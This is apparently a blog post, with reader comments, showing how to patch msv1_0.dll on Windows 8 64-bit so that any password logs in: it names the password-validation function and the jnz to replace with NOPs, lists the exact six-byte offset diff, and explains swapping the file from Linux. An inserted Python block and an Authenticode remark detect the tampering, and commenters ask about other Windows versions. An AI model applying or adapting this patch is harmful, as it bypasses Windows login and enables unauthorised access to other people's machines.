Fun with msv1_0.dll in Windows 8 64bit

I've always wondered what this logo reminded me of... wait, it was an old Greek state flag from 1822 – 1969. The colors were used in the Greek revolution, when they fought the Ottoman Empire.

OK, now we move on to the latest OS from Microsoft -> Windows 8 Pro 64bit. Many functions inside this library have no names or descriptions, which makes debugging harder, but not impossible. I had to go manually through all the functions to check for our RtlCompareMemory friends and find the correct section which needs to be patched. The PDB for msv1_0.dll on the Microsoft Symbol Server seems to be incomplete (or at least this is how I understand it).

So after a careful analysis I came up with the following unnamed function that should correspond to MsvpPasswordValidate:

It is: sub_18001014C

Next we look for the RtlCompareMemory call and patch our jnz with NOPs. In this case the block starts at loc_1800101F0 and the jnz is at 18001B4B7.

So we open it in HEX view and make our modifications to the jnz at 18001B4B7.

Produce a diff and patch the file, reboot into Linux, copy over C:\windows\system32\msv1_0.dll and reboot; any password should now work to log in to the system.

0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90

Here is the patch for the file. Use ida_patcher.exe to patch the original msv1_0.dll and test in your lab.
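As an added example (not the author's code), the following Python parses the IDA-style "offset: old new" diff shown above and tells a defender which side of it a copy of the DLL matches, so a deployed msv1_0.dll can be checked against this known tamper signature. The sample images are constructed in the block; the offsets apply only to the Windows 8 x64 build the post analysed.

```python
import re
from typing import Dict, Tuple

# The six-byte diff from the post (IDA "offset: old new" format). The original
# bytes 0F 85 A8 B2 00 00 are a near jnz rel32; the patch replaces them with NOPs.
IDA_DIFF = """\
0000F609: 0F 90
0000F60A: 85 90
0000F60B: A8 90
0000F60C: B2 90
0000F60D: 00 90
0000F60E: 00 90
"""

DIFF_LINE = re.compile(r"^\s*([0-9A-Fa-f]+):\s*([0-9A-Fa-f]{2})\s+([0-9A-Fa-f]{2})\s*$")

def parse_ida_diff(text: str) -> Dict[int, Tuple[int, int]]:
    """Map file offset -> (original byte, patched byte); reject malformed lines."""
    entries: Dict[int, Tuple[int, int]] = {}
    for line in text.splitlines():
        if not line.strip():
            continue
        m = DIFF_LINE.match(line)
        if not m:
            raise ValueError(f"unparseable diff line: {line!r}")
        entries[int(m.group(1), 16)] = (int(m.group(2), 16), int(m.group(3), 16))
    return entries

def side_bytes(diff: Dict[int, Tuple[int, int]], patched: bool) -> bytes:
    """Bytes of one side of the diff in offset order (for disassembly or signatures)."""
    return bytes(diff[off][1 if patched else 0] for off in sorted(diff))

def classify_image(data: bytes, diff: Dict[int, Tuple[int, int]]) -> str:
    """'original' if every offset holds the pre-patch byte, 'patched' if every
    offset holds the post-patch byte, otherwise 'unknown' (different build or
    a partial/other modification)."""
    if any(off >= len(data) for off in diff):
        return "unknown"
    if all(data[off] == orig for off, (orig, _) in diff.items()):
        return "original"
    if all(data[off] == new for off, (_, new) in diff.items()):
        return "patched"
    return "unknown"

def build_sample(diff: Dict[int, Tuple[int, int]], patched: bool) -> bytes:
    """Constructed stand-in for a DLL image: zero-filled, with one diff side written in."""
    buf = bytearray(max(diff) + 1)
    for off, (orig, new) in diff.items():
        buf[off] = new if patched else orig
    return bytes(buf)
```

On a live host the authoritative check is Authenticode: a byte-patched msv1_0.dll no longer verifies (for example with Get-AuthenticodeSignature in PowerShell), and this byte-level check only adds which known modification was applied.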


12 Responses to Fun with msv1_0.dll in Windows 8 64bit

  1. x4r0r says:

    Where can I find the download?!

  2. x4r0r says:

    Only what you copied and pasted? Without modifying anything!???

  3. B4ckBOne says:

    I wondered why this is needed since there is Kon-Boot.
    But Kon-Boot is no longer free :-/
    So thank you again & keep up the good work.
    Yours, B4ckBOne

  4. SteveSi says:

    Can't get the patch for 8.1 32-bit to work (others OK). When I try to log on I get an RPC call error. Any idea how to get the patch to work?

  5. SteveSi says:

    Do you have time to look at Win10 TH2?

  6. SteveSi says:

    I tried looking for about 4 hours, but I couldn't find similar code, so I think MS have changed the code a lot, maybe to prevent this type of patching?
